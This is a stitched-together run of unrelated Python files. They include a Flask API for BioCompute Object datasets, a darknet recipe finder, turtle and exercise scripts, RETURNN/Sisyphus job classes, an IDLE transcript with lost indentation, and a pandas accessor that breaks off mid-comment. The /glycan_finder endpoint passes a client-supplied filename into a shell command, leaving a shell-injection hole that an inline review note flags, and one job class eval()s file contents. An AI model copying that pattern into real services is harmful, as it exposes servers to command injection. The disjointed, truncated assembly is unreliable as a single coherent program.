            r_two = get_many_text_search(req_obj)
            if "error" in r_two:
                return r_two
            out_dict = {}
            for obj in r_two["recordlist"]:
                # recordid format: "<prefix>_<bcoidx>_<fileidx>_<rowidx>"
                prefix, bco_idx, file_idx, row_idx = obj["recordid"].split("_")
                bco_id = prefix + "_" + bco_idx
                if bco_id not in bco_dict:
                    continue
                bco_title, file_name = bco_dict[bco_id]["title"], bco_dict[bco_id]["filename"]
                o = {
                    "recordid":obj["recordid"],
                    "bcoid":bco_id, "fileidx":file_idx,
                    "filename":file_name, "title":bco_title,
                    "categories":bco_dict[bco_id]["categories"],
                    "rowlist":[]
                }
                # Group matched rows under one entry per BCO.
                if bco_id not in out_dict:
                    out_dict[bco_id] = o
                out_dict[bco_id]["rowlist"].append(int(row_idx))
            for bco_id in sorted(out_dict):
                res_obj["recordlist"].append(out_dict[bco_id])
        #dataset metadata search
        seen = {}
        req_obj["coll"] = "c_bco"
        r_three = get_many_text_search(req_obj)
        if "error" in r_three:
            return r_three
        r_four = get_many(req_obj)
        if "error" in r_four:
            return r_four
        for doc in r_three["recordlist"] + r_four["recordlist"] :
            if "object_id" in doc:
                bco_id = doc["object_id"].split("/")[-2]
                seen[bco_id] = True
        # NOTE(review): out_dict is only bound in the non-empty-query branch
        # above; with query == "" this line only avoids a NameError because
        # `seen` is empty and the condition short-circuits -- confirm and guard.
        for doc in r_one["recordlist"]:
            if doc["bcoid"] in seen and doc["bcoid"] not in out_dict:
                res_obj["recordlist"].append(doc)
        n = len(res_obj["recordlist"])
        res_obj["stats"] = {"total":n, "retrieved":n}
        if n != 0:
            # Persist results in the cache collection keyed by list_id.
            ts_format = "%Y-%m-%d %H:%M:%S %Z%z"
            ts = datetime.datetime.now(pytz.timezone('US/Eastern')).strftime(ts_format)
            cache_info = { "reqobj":req_obj, "ts":ts}
            cache_obj = { "list_id":list_id, "cache_info":cache_info, "results":res_obj}
            cache_coll = "c_cache"
            res = mongo_dbh[cache_coll].insert_one(cache_obj)
        # Clients retrieve the actual records through /list using this id.
        res_obj = {"list_id":list_id}
        return res_obj
@api.route('/list')
class DatasetList(Resource):
    '''Return cached search results previously stored by /search.'''
    @api.doc('get_dataset')
    @api.expect(dataset_list_query_model)
    #@api.marshal_list_with(ds_model)
    def post(self):
        '''Get search results'''
        req_obj = request.json
        req_obj["coll"] = "c_cache"
        cached = get_one(req_obj)
        if "error" in cached:
            return cached
        record = cached["record"]
        return {
            "status": 1,
            "recordlist": record["results"]["recordlist"],
            "stats": record["results"]["stats"],
            "searchquery": record["cache_info"]["reqobj"]["query"]
        }
@api.route('/detail')
class DatasetDetail(Resource):
    '''Show a single dataset item'''
    @api.doc('get_dataset')
    @api.expect(dataset_detail_query_model)
    #@api.marshal_with(ds_model)
    def post(self):
        '''Return one dataset: extract data, BCO document and version history.

        Bug fix: the early-exit check in the row-collection loop used `>`,
        but the counters are capped at their limits (only incremented while
        strictly below them), so the break could never fire and the loop
        always scanned every record.  Use `>=` so it stops once both row
        lists are full; collected results are unchanged.
        '''
        req_obj = request.json
        ver_list = get_ver_list(req_obj["bcoid"])
        req_obj["coll"] = "c_extract"
        extract_obj = get_one(req_obj)
        if "error" in extract_obj:
            return extract_obj
        # NOTE(review): res is used without an "error" check below -- confirm
        # get_many_text_search always returns "recordlist" on success.
        res = get_many_text_search({"coll":"c_records", "query":req_obj["bcoid"]})
        # row_list_one: rows explicitly requested via req_obj["rowlist"];
        # row_list_two: remaining rows (capped preview).
        row_list_one, row_list_two = [], []
        limit_one, limit_two = 1000, 1000
        row_count_one, row_count_two = 0, 0
        req_obj["rowlist"] = [] if "rowlist" not in req_obj else req_obj["rowlist"]
        for obj in res["recordlist"]:
            row_idx = int(obj["recordid"].split("_")[-1])
            row = json.loads(obj["row"])
            if row_idx in req_obj["rowlist"] and row_count_one < limit_one:
                row_list_one.append(row)
                row_count_one += 1
            elif row_count_two < limit_two:
                row_list_two.append(row)
                row_count_two += 1
            if row_count_one >= limit_one and row_count_two >= limit_two:
                break
        # Shape "resultdata" (requested rows) and "alldata" (preview) to match
        # the sample data's type.
        if extract_obj["record"]["sampledata"]["type"] == "table":
            # Tabular: the first sampledata row supplies the column labels.
            header_row = []
            for obj in extract_obj["record"]["sampledata"]["data"][0]:
                header_row.append(obj["label"])
            extract_obj["record"]["alldata"] = {"type":"table", "data":[]}
            extract_obj["record"]["resultdata"] = {"type":"table", "data":[]}
            extract_obj["record"]["resultdata"]["data"].append(header_row)
            extract_obj["record"]["alldata"]["data"].append(header_row)
            extract_obj["record"]["resultdata"]["data"] += row_list_one
            extract_obj["record"]["alldata"]["data"] += row_list_two
        elif extract_obj["record"]["filetype"] in ["gz"]:
            # Gzipped sources: render each row's first column as plain text.
            extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
            extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
            r_list_one, r_list_two = [], []
            for row in row_list_one:
                r_list_one.append("\n"+row[0])
            for row in row_list_two:
                r_list_two.append("\n"+row[0])
            extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
            extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
        elif extract_obj["record"]["sampledata"]["type"] in ["html"]:
            # FASTA-like rendering: ">header" line then the sequence/body.
            extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
            extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
            r_list_one, r_list_two = [], []
            for row in row_list_one:
                r_list_one.append("\n>"+row[-1]+"\n"+row[0])
            for row in row_list_two:
                r_list_two.append("\n>"+row[-1]+"\n"+row[0])
            extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
            extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
        elif extract_obj["record"]["sampledata"]["type"] in ["text"]:
            extract_obj["record"]["alldata"] = {"type":"html", "data":"<pre>"}
            extract_obj["record"]["resultdata"] = {"type":"html", "data":"<pre>"}
            r_list_one, r_list_two = [], []
            for row in row_list_one:
                r_list_one.append(row[0])
            for row in row_list_two:
                r_list_two.append(row[0])
            extract_obj["record"]["resultdata"]["data"] = "\n".join(r_list_one)
            extract_obj["record"]["alldata"]["data"] = "\n".join(r_list_two)
        extract_obj["record"].pop("sampledata")
        # Version history, restricted to the versions this BCO actually has.
        req_obj["coll"] = "c_history"
        req_obj["doctype"] = "track"
        history_obj = get_one(req_obj)
        if "error" in history_obj:
            return history_obj
        history_dict = {}
        for ver in history_obj["record"]["history"]:
            if ver in ver_list:
                history_dict[ver] = history_obj["record"]["history"][ver]
        # The BCO document itself, with fields ordered per conf/config.json.
        req_obj["coll"] = "c_bco"
        req_obj["bcoid"] = "https://biocomputeobject.org/%s" % (req_obj["bcoid"])
        bco_obj = get_one(req_obj)
        if "error" in bco_obj:
            return bco_obj
        SITE_ROOT = os.path.realpath(os.path.dirname(__file__))
        json_url = os.path.join(SITE_ROOT, "conf/config.json")
        config_obj = json.load(open(json_url))
        #return list(bco_obj["record"].keys())
        bco_obj["record"] = order_json_obj(bco_obj["record"], config_obj["bco_field_order"])
        #return list(bco_obj["record"].keys())
        res_obj = {
            "status":1,
            "record":{
                "extract":extract_obj["record"],
                "bco":bco_obj["record"],
                "history":history_dict
            }
        }
        return res_obj
@api.route('/pagecn')
class Dataset(Resource):
    '''Return stored static page content by page id.'''
    @api.doc('get_dataset')
    @api.expect(pagecn_query_model)
    #@api.marshal_with(ds_model)
    def post(self):
        '''Get static page content '''
        query = request.json
        query["coll"] = "c_html"
        return get_one(query)
@api.route('/historylist')
class HistoryList(Resource):
    '''Get dataset history list '''
    @api.doc('historylist')
    @api.expect(dataset_historylist_query_model)
    #@api.marshal_list_with(ds_model)
    def post(self):
        '''Get dataset history list '''
        req_obj = request.json
        req_obj["coll"] = "c_history"
        req_obj["query"] = "" if "query" not in req_obj else req_obj["query"]
        hist_obj = get_many(req_obj)
        if "error" in hist_obj:
            return hist_obj
        # Table response: one row per BCO that has history for the requested
        # data release.
        res_obj = {"tabledata":{"type": "table","data": []}}
        header_row = [
            {"type": "string", "label": "BCOID"}
            ,{"type": "string", "label": "File Name"}
            ,{"type": "number", "label": "Field Count"}
            ,{"type": "number", "label": "Fields Added"}
            ,{"type": "number", "label": "Fields Removed"}
            ,{"type": "number", "label": "Row Count"}
            ,{"type": "number", "label": "Rows Count Prev"}
            ,{"type": "number", "label": "Rows Count Change"}
            ,{"type": "number", "label": "ID Count"}
            ,{"type": "number", "label": "IDs Added"}
            ,{"type": "number", "label": "IDs Removed"}
            ,{"type": "string", "label": ""}
        ]
        # History fields copied into each row, in column order (after BCOID).
        f_list = ["file_name",
            "field_count", "fields_added", "fields_removed",
            "row_count", "row_count_last", "row_count_change",
            "id_count", "ids_added", "ids_removed"
        ]
        res_obj["tabledata"]["data"].append(header_row)
        for obj in hist_obj["recordlist"]:
            if "history" in obj:
                # NOTE(review): "dataversion" is read from the request but is
                # not declared in dataset_historylist_query_model -- confirm
                # clients always send it (KeyError otherwise).
                ver_one = req_obj["dataversion"]
                # Versions are stored with "_" instead of "." -- presumably to
                # avoid dots in Mongo keys; confirm.
                ver_two = ver_one.replace(".", "_")
                if ver_two in obj["history"]:
                    row = [obj["bcoid"]]
                    for f in f_list:
                        row.append(obj["history"][ver_two][f])
                    row.append("<a href=\"/%s/%s/history\">details</a>" % (obj["bcoid"],ver_one))
                    # Optional case-insensitive substring filter over the
                    # BCOID and File Name columns.
                    match_flag = True
                    idx_list = []
                    if req_obj["query"] != "":
                        q = req_obj["query"].lower()
                        for v in [row[0].lower(), row[1].lower()]:
                            idx_list.append(v.find(q))
                        match_flag = False if idx_list == [-1,-1] else match_flag
                    if match_flag == True:
                        res_obj["tabledata"]["data"].append(row)
        return res_obj
@api.route('/historydetail')
class HistoryDetail(Resource):
    '''Return the history entry of one dataset for one data release.'''
    @api.doc('get_dataset')
    @api.expect(dataset_historydetail_query_model)
    #@api.marshal_with(ds_model)
    def post(self):
        '''Get single dataset history object'''
        req_obj = request.json
        req_obj["coll"] = "c_history"
        res_obj = get_one(req_obj)
        if "error" in res_obj:
            return res_obj
        # History entries are keyed with "_" in place of "." in the version.
        ver_key = req_obj["dataversion"].replace(".", "_")
        res_obj["record"]["history"] = res_obj["record"]["history"][ver_key]
        return res_obj
@api.route('/init')
class Dataset(Resource):
    '''Return the stored init payload.'''
    @api.doc('get_dataset')
    @api.expect(init_query_model)
    def post(self):
        '''Get init '''
        # The request body is ignored; the payload comes from a fixed collection.
        #req_obj = request.json
        query = {"coll": "c_init"}
        return get_one(query)
@api.route('/upload', methods=['GET', 'POST'])
class DatasetUpload(Resource):
    '''Upload dataset item'''
    @api.doc('upload_dataset')
    @api.expect(dataset_upload_query_model)
    #@api.marshal_with(ds_model)
    def post(self):
        '''Upload dataset'''
        # Accepts a multipart form: the file under "userfile" (or "file") plus
        # format/qctype/dataversion fields; saves the file to the tmp area and
        # runs QC on it.
        res_obj = {}
        req_obj = request.form
        error_obj = {}
        if request.method != 'POST':
            error_obj = {"error":"only POST requests are accepted"}
        elif 'userfile' not in request.files and 'file' not in request.files:
            error_obj = {"error":"no file parameter given"}
        else:
            file = request.files['userfile'] if "userfile" in request.files else request.files['file']
            file_format = req_obj["format"]
            qc_type = req_obj["qctype"]
            data_version = req_obj["dataversion"]
            file_data = []
            if file.filename == '':
                error_obj = {"error":"no filename given"}
            else:
                # secure_filename strips path components from the client name.
                file_name = secure_filename(file.filename)
                # NOTE(review): assumes DATA_PATH and SERVER are always set in
                # the environment -- confirm deployment guarantees this.
                data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
                out_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, file_name)
                file.save(out_file)
                res_obj = {
                    "inputinfo":{"name":file_name, "format":file_format},
                    "summary":{"fatal_qc_flags":0, "total_qc_flags":0},
                    "failedrows":[]
                }
                # run_qc fills res_obj in place; a non-empty return is an error.
                error_obj = run_qc(out_file, file_format, res_obj, qc_type, data_version)
        res_obj = error_obj if error_obj != {} else res_obj
        return res_obj
@api.route('/submit')
class Dataset(Resource):
    '''Submit dataset '''
    @api.doc('get_dataset')
    @api.expect(dataset_submit_query_model)
    def post(self):
        '''Submit a previously uploaded dataset file.

        Copies the file out of tmp/ into the submitter's affiliation directory
        (or "other" if that directory does not exist) and writes a JSON
        sidecar with the request metadata.
        '''
        req_obj = request.json
        data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
        # Security fix: the filename comes straight from the client and was
        # interpolated into a shell `cp` command (shell-injection and path
        # traversal risk).  Sanitize it with secure_filename -- consistent
        # with /upload, which stores files under the sanitized name -- and
        # copy with shutil instead of a shell command.
        file_name = secure_filename(req_obj["filename"])
        src_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, file_name)
        # NOTE(review): "affilation" is also client-supplied; the isdir check
        # below falls back to "other", but confirm it cannot point elsewhere.
        dst_dir = "%s/userdata/%s/%s" % (data_path, ser, req_obj["affilation"])
        if os.path.isfile(src_file) == False:
            res_obj = {"error":"submitted filename does not exist!", "status":0}
        else:
            if os.path.isdir(dst_dir) == False:
                dst_dir = "%s/userdata/%s/%s" % (data_path, ser, "other")
            today = datetime.datetime.today()
            yy, mm, dd = today.year, today.month, today.day
            dst_file = "%s/%s_%s_%s_%s" % (dst_dir, mm, dd, yy, file_name)
            json_file = ".".join(dst_file.split(".")[:-1]) + ".json"
            import shutil
            try:
                shutil.copyfile(src_file, dst_file)
            except OSError:
                pass  # fall through: the isfile check below reports failure
            if os.path.isfile(dst_file) == False:
                res_obj = {"error":"save file failed!", "status":0}
            else:
                res_obj = {"confirmation":"Dataset file has been submitted successfully!", "status":1}
                with open(json_file, "w") as FW:
                    FW.write("%s\n" % (json.dumps(req_obj, indent=4)))
        return res_obj
@api.route('/glycan_finder')
class Dataset(Resource):
    '''Glycan Finder '''
    @api.doc('get_dataset')
    @api.expect(glycan_finder_query_model)
    def post(self):
        '''Glyca Finder '''
        # Runs the external glycan-finder pipeline on an uploaded file and
        # returns one table row (links + image) per detected accession.
        req_obj = request.json
        data_path, ser = os.environ["DATA_PATH"], os.environ["SERVER"]
        uploaded_file = "%s/userdata/%s/tmp/%s" % (data_path, ser, req_obj["filename"])
        # PID suffix keeps concurrent requests from clobbering each other.
        output_file = "%s/userdata/%s/tmp/%s_output_%s.txt" % (data_path, ser, req_obj["filename"], os.getpid())
        if os.path.isfile(uploaded_file) == False:
            res_obj = {"error":"submitted filename does not exist!", "status":0}
        else:
            file_format = req_obj["filename"].split(".")[-1]
            # NOTE(review): req_obj["filename"] is client-supplied and is
            # interpolated into a shell command -- sanitize it (e.g. with
            # secure_filename, as /upload does) to prevent shell injection.
            cmd = "sh /hostpipe/glycan_finder.sh %s %s" % (uploaded_file, output_file)
            glycan_list = []
            if ser != "dev":
                # The finder prints a comma-separated accession list on stdout.
                glycan_list = subprocess.getoutput(cmd).strip().split(",")
            else:
                # Dev servers have no pipeline: fixed stub after a mock delay.
                glycan_list = ["A", "B"]
                time.sleep(5)
            res_obj = {
                "inputinfo":{"name":req_obj["filename"], "format":file_format},
                "mappingrows":[
                    [
                        {"type": "string", "label": "GlyToucan Accession"},
                        {"type": "string", "label": "Glycan Image"}
                    ]
                ]
            }
            # One row per accession: detail/related-glycan links plus an image.
            for ac in glycan_list:
                link_one = "<a href=\"https://glygen.org/glycan/%s\" target=_>%s</a>" % (ac,ac)
                link_two = "<a href=\"https://gnome.glyomics.org/restrictions/GlyGen.StructureBrowser.html?focus=%s\" target=_>related glycans</a>" % (ac)
                img = "<img src=\"https://api.glygen.org/glycan/image/%s\">" % (ac)
                links = "%s (other %s)" % (link_one, link_two)
                res_obj["mappingrows"].append([links, img])
        return res_obj
|
from gerenciar_avaliacoes import * |
import pickle
import json
import subprocess

# Reverse index: maps a detected ingredient label -> list of dish_ids that
# contain it.
# FIX: all file handles below now use context managers; the original left
# the pickle handle and both subprocess redirection handles open.
with open("reverse_index.pickle", "rb") as index_file:
    reverse_index = pickle.load(index_file)

# Run the darknet detector over the image paths listed in detect.txt and
# capture its stdout in result.txt.  Equivalent shell command:
# darknet detector test data_for_local/obj.data data_for_local/obj.cfg obj_2000.weights -i 0 -thresh 0.3 < detect.txt > result.txt
with open("detect.txt", "r") as f1, open("result.txt", "w") as f2:
    subprocess.run(["./darknet", "detector", "test", "../data_for_local/obj.data",
                    "../data_for_local/obj.cfg", "../obj_2000.weights", "-i", "0", "-thresh", "0.1"],
                   cwd="darknet", stdin=f1, stdout=f2)

with open("result.txt", "r") as f:
    predictions = f.readlines()

# Collect the distinct ingredient labels darknet reported.  Detection lines
# look like "<label>: <confidence>"; interactive prompt lines are skipped.
query = set()
for prediction in predictions:
    if not prediction.startswith("Enter Image Path:"):
        ans = prediction[:prediction.index(':')]
        query.add(ans)
query = list(query)

# Intersect the dish-id sets of every detected ingredient.
# NOTE(review): raises IndexError when nothing was detected — unchanged from
# the original behavior.
result = set(reverse_index[query[0]])
for i in query:
    result = result & set(reverse_index[i])

with open("food_db.json", "r") as db_file:
    food_data = json.load(db_file)

# Build the recipe list, de-duplicating dishes by URL.
answer = []
hash_ = set()
for r in result:
    for dish in food_data:
        if r == dish['dish_id'] and dish['url'] not in hash_:
            answer.append({'dish_name':dish['dish_name'], 'link' : dish['url'], 'ingredients' : dish['ingredients']})
            hash_.add(dish['url'])

print()
print("DETECTED", query)
print()
print(f"SHOWING {len(answer)} RECIPES")
print("-" * 40)
print()
for i in answer:
    print("DISH NAME", i['dish_name'])
    print("LINK", i['link'])
    print("=" * 40)
import turtle

# Five Olympic-style rings: (pen colour, centre offset) per circle.
_RINGS = [
    ("blue", (-60, 60)),
    ("yellow", (0, 0)),
    ("black", (60, 60)),
    ("green", (120, 0)),
    ("red", (180, 60)),
]

first_ring = True
for ring_color, ring_pos in _RINGS:
    turtle.penup()
    if first_ring:
        # The original sketch positioned the turtle and lowered the pen
        # before setting the colour on the very first ring; preserve that
        # exact call order.
        turtle.setposition(*ring_pos)
        turtle.pendown()
        turtle.color(ring_color)
        first_ring = False
    else:
        turtle.color(ring_color)
        turtle.setposition(*ring_pos)
        turtle.pendown()
    turtle.circle(50)
turtle.penup()

# Keep the window open until the user closes it.
turtle.mainloop()
# Interactive arithmetic-progression printer (prompts/output in Portuguese).
# Prints the first 10 terms, then repeatedly asks how many further terms to
# show, until the user answers 0.
termo = int(input('Digite o primeiro termo: '))  # first term of the progression
razao = int(input('Digite a razão: '))  # common difference
termoMais = 1  # how many extra terms the user wants (sentinel: 0 ends the loop)
c = 1  # 1-based index of the next term to print
quantTermo = 10  # running count of terms shown, reported at the end
while termoMais != 0:
    # First pass only: print terms 1..10 (on later passes c >= 11, so this
    # inner loop is skipped).
    while c < 11:
        an = termo + (c-1)*razao  # n-th term: a1 + (n-1)*r
        print(an , '-> ' if c < 10 else '', end='')
        c += 1
    print('pausa')
    termoMais = int(input('Quantos termos você ainda quer mostrar mais?\n'))
    quantTermo += termoMais
    contadorTermosMais = 1
    # Print the extra batch of terms, continuing from index c.
    while contadorTermosMais < termoMais + 1:
        an = termo + (c-1)*razao
        # Arrow separator is omitted after the last term of the batch.
        print(an , '-> ' if contadorTermosMais < termoMais else '', end='')
        c += 1
        contadorTermosMais += 1
print('Progressão finalizada com {} termos'.format(quantTermo))
__all__ = ['RETURNNSearchFromFile', 'ReturnnScore', 'SearchBPEtoWords', 'SearchWordsToCTM']
from sisyphus import *
Path = setup_path(__package__)
import os
import stat
import subprocess as sp
from recipe.default_values import RETURNN_PYTHON_EXE, RETURNN_SRC_ROOT
class RETURNNSearchFromFile(Job):
    """Sisyphus job that runs RETURNN search (``rnn.py``) from an existing
    RETURNN config file, forwarding extra parameters as ``++key value``
    command-line overrides.
    """
    def __init__(self, returnn_config_file, parameter_dict, output_mode="py",
                 time_rqmt=4, mem_rqmt=4,
                 returnn_python_exe=None, returnn_root=None):
        """
        :param returnn_config_file: existing RETURNN config to run
        :param parameter_dict: extra ``++key value`` overrides for rnn.py
            (may be None; tk.Variable/tk.Path values are resolved at run time)
        :param output_mode: search output format, 'py' or 'txt'
        :param time_rqmt: scheduler time requirement
        :param mem_rqmt: scheduler memory requirement
        :param returnn_python_exe: python interpreter used to start RETURNN
        :param returnn_root: RETURNN source checkout containing rnn.py
        """
        self.returnn_python_exe = returnn_python_exe
        self.returnn_root = returnn_root
        self.returnn_config_file_in = returnn_config_file
        self.parameter_dict = parameter_dict
        if self.parameter_dict is None:
            self.parameter_dict = {}
        self.returnn_config_file = self.output_path('returnn.config')
        self.rqmt = { 'gpu' : 1, 'cpu' : 2, 'mem' : mem_rqmt, 'time' : time_rqmt }
        assert output_mode in ['py', 'txt']
        self.out = self.output_path("search_out.%s" % output_mode)
        # Inject the output location/format into the RETURNN parameters so
        # rnn.py writes its search output directly into this job's output.
        self.parameter_dict['search_output_file'] = tk.uncached_path(self.out)
        self.parameter_dict['search_output_file_format'] = output_mode
    def update(self):
        # When an external model/epoch pair is given, register the checkpoint
        # index file as an input so the job waits until the checkpoint exists.
        if "ext_model" in self.parameter_dict.keys() and "ext_load_epoch" in self.parameter_dict.keys():
            epoch = self.parameter_dict['ext_load_epoch']
            epoch = epoch.get() if isinstance(epoch, tk.Variable) else epoch
            model_dir = self.parameter_dict['ext_model']
            if isinstance(model_dir, tk.Path):
                # Preserve the creator so sisyphus keeps the dependency edge.
                self.add_input(Path(str(model_dir) + "/epoch.%03d.index" % epoch, creator=model_dir.creator))
            else:
                self.add_input(Path(str(model_dir) + "/epoch.%03d.index" % epoch))
    def tasks(self):
        yield Task('create_files', mini_task=True)
        yield Task('run', resume='run', rqmt=self.rqmt)
    def get_parameter_list(self):
        """Render ``parameter_dict`` as a sorted ``++key value`` argv list,
        resolving tk.Variable/tk.Path values to plain strings."""
        parameter_list = []
        for k,v in sorted(self.parameter_dict.items()):
            if isinstance(v, tk.Variable):
                v = str(v.get())
            elif isinstance(v, tk.Path):
                v = tk.uncached_path(v)
            else:
                v = str(v)
            # RETURNN expects the checkpoint file prefix, not the directory.
            if k == "ext_model" and not v.endswith("/epoch"):
                v = v + "/epoch"
            parameter_list.append("++%s" % k)
            parameter_list.append(v)
        return parameter_list
    def create_files(self):
        # Copy the config into the job dir and write a standalone rnn.sh
        # launcher (handy for manual re-runs and debugging).
        self.sh("cp {returnn_config_file_in} {returnn_config_file}")
        parameter_list = self.get_parameter_list()
        with open('rnn.sh', 'wt') as f:
            f.write('#!/usr/bin/env bash\n%s' % ' '.join([tk.uncached_path(self.returnn_python_exe), os.path.join(tk.uncached_path(self.returnn_root), 'rnn.py'), self.returnn_config_file.get_path()] + parameter_list))
        os.chmod('rnn.sh', stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    def run(self):
        parameter_list = self.get_parameter_list()
        sp.check_call([tk.uncached_path(self.returnn_python_exe), os.path.join(tk.uncached_path(self.returnn_root), 'rnn.py'), self.returnn_config_file.get_path()] + parameter_list)
    @classmethod
    def hash(cls, kwargs):
        # Exclude time/mem requirements from the job hash so changing them
        # does not invalidate already-finished jobs.
        d = { 'returnn_config_file' : kwargs['returnn_config_file'],
              'parameter_dict' : kwargs['parameter_dict'],
              'returnn_python_exe' : kwargs['returnn_python_exe'],
              'returnn_root' : kwargs['returnn_root'],
              'output_mode': kwargs['output_mode']}
        return super().hash(d)
class GetBestEpoch(Job):
    """Pick the epoch with the (index-th) best dev score from a RETURNN
    learning-rates file and store it in the ``epoch`` output variable.
    """
    __sis_hash_exclude__ = {'key': None}
    def __init__(self, model_dir, learning_rates, index=0, key=None):
        """
        :param model_dir: model directory (stored for bookkeeping/hashing)
        :param learning_rates: path to RETURNN's learning_rates file
        :param index: 0 -> best epoch, 1 -> second best, ...
        :param key: error-dict key to rank by; when None, the first key of
            the last epoch that starts with 'dev_score' is used
        """
        self.model_dir = model_dir
        self.learning_rates = learning_rates
        self.index = index
        self.out_var = self.output_var("epoch")
        self.key = key
        assert index >= 0 and isinstance(index, int)
    def run(self):
        def EpochData(learningRate, error):
            # Referenced by name from inside the evaluated text: the
            # learning-rates file is a Python literal of EpochData(...) calls.
            return {'learning_rate': learningRate, 'error': error}
        with open(self.learning_rates.get_path(), 'rt') as f:
            text = f.read()
        # NOTE: eval() of file contents. Acceptable only because the file is
        # produced by RETURNN itself -- never point this at untrusted input.
        data = eval(text)
        epochs = list(sorted(data.keys()))
        if self.key is None:  # FIX: identity check instead of '== None'
            dev_score_keys = [k for k in data[epochs[-1]]['error'] if k.startswith('dev_score')]
            dsk = dev_score_keys[0]
        else:
            dsk = self.key
        # Rank every epoch that reports the chosen score, ascending (lower
        # score is better).
        dev_scores = [(epoch, data[epoch]['error'][dsk]) for epoch in epochs if dsk in data[epoch]['error']]
        sorted_scores = list(sorted(dev_scores, key=lambda x: x[1]))
        print(sorted_scores)
        self.out_var.set(sorted_scores[self.index][0])
    def tasks(self):
        yield Task('run', mini_task=True)
class SearchBPEtoWords(Job):
    """Merge BPE sub-word units in a RETURNN search output back into words.

    :param search_output_bpe: search output file containing BPE tokens
    :param script: converter script, invoked via ``python3``
    """
    def __init__(self, search_output_bpe, script=Path("scripts/search-bpe-to-words.py")):
        self.search_output_bpe = search_output_bpe
        self.script = script
        self.out = self.output_path("search_output.words")
    def tasks(self):
        yield Task('run', mini_task=True)
    def run(self):
        # Placeholders are expanded from the job's attributes by self.sh.
        self.sh("python3 {script} {search_output_bpe} --out {out}")
class SearchWordsToCTM(Job):
    """Turn a word-level RETURNN search output into a CTM file.

    :param search_output_words: word-level search output file
    :param corpus: corpus file used to recover segment information
    :param only_segment_name: pass ``--only-segment-name`` to the converter
    :param script: converter script, invoked via ``python3``
    """
    __sis_hash_exclude__ = {"only_segment_name": False}
    def __init__(self, search_output_words, corpus, only_segment_name=False, script=Path("scripts/search-words-to-ctm.py")):
        self.search_output_words = search_output_words
        self.corpus = corpus
        self.script = script
        self.only_segment_name = only_segment_name
        self.out = self.output_path("search_output.ctm")
    def tasks(self):
        yield Task('run', mini_task=True)
    def run(self):
        # Splice the optional flag into the template before self.sh expands
        # the {placeholders} from job attributes.
        segment_flag = "--only-segment-name" if self.only_segment_name else ""
        self.sh("python3 {script} {search_output_words} --corpus {corpus} %s --out {out}" % segment_flag)
class ReturnnScore(Job):
    """Compute word error rate with RETURNN's calculate-word-error-rate tool.
    """
    def __init__(self, hypothesis, reference, returnn_python_exe=RETURNN_PYTHON_EXE, returnn_root=RETURNN_SRC_ROOT):
        """
        :param hypothesis: recognition output file (--hyps)
        :param reference: reference transcription file (--refs)
        :param returnn_python_exe: python interpreter used to run the tool
        :param returnn_root: RETURNN source checkout
        """
        # set_attrs stores every constructor argument (captured via locals())
        # as an attribute on the job instance.
        self.set_attrs(locals())
        self.out = self.output_path("wer")
    def run(self):
        call = [str(self.returnn_python_exe), os.path.join(str(self.returnn_root), 'tools/calculate-word-error-rate.py'),
                "--expect_full",
                "--hyps",
                str(self.hypothesis), "--refs", str(self.reference), "--out", str(self.out)]
        # Echo the full command line for easier debugging from the job log.
        print("run %s" % " ".join(call))
        sp.check_call(call)
    def tasks(self):
        yield Task('run', mini_task=True)
|
Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:43:08) [MSC v.1926 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> #I pledge my honor that I have abided by the Stevens Honor system -Kyriacos Petrou
>>> #write a program that computes the sum of a list of numbers
>>> def main():
lst = []
num = int(input('How many numbers: '))
for n in range(num):
numbers = int(input('Enter number '))
lst.append(numbers)
print("Sum of elements in given lists is :", sum(lst))
>>> main()
How many numbers: 5
Enter number 1
Enter number 2
Enter number 3
Enter number 4
Enter number 5
Sum of elements in given lists is : 15
>>> |
# set practice: course rosters as lists of student names.
math = ["张三", "田七", "李四", "马六"]
english = ["李四", "王五", "田七", "陈八"]
art = ["陈八", "张三", "田七", "赵九"]
music = ["李四", "田七", "马六", "赵九"]

# 1. Students enrolled in both math and music.
print(set(math) & set(music))
# 2. Students enrolled in math, english and music.
print(set(math) & set(english) & set(music))
# 3. Students enrolled in all four courses.
print(set(math) & set(english) & set(art) & set(music))
# Modifications © 2020 Hashmap, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from sys import platform
from providah.factories.package_factory import PackageFactory as pf
import pandas as pd
import yaml
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
@pd.api.extensions.register_dataframe_accessor('dataframez')
class CatalogWriter:
    """Extends pandas DataFrame to write to a cataloged persistent storage.

    Registered as the ``.dataframez`` accessor, so ``df.dataframez.to_csv(...)``
    (or ``to_pickle`` / ``to_parquet``) writes through a configured writer and
    registers the asset in a catalog. All configuration is read from
    ``~/.dataframez/configuration.yml``.
    """

    __logger = logging.getLogger()

    # Resolve the per-user configuration file location.
    # FIX: ``sys.platform`` is 'win32' on Windows -- it is never the string
    # 'windows' -- so the original ``platform.lower() != 'windows'`` test
    # always took the HOME branch and failed on Windows (HOME unset).
    if not platform.lower().startswith('win'):
        __configuration_path: str = os.path.join(os.getenv("HOME"), '.dataframez/configuration.yml')
    else:
        __configuration_path: str = os.path.join(os.getenv("USERPROFILE"), '.dataframez/configuration.yml')

    def __init__(self, df: pd.DataFrame):
        self._df = df
        # FIX: the writer registry is now a per-instance dict; it used to be
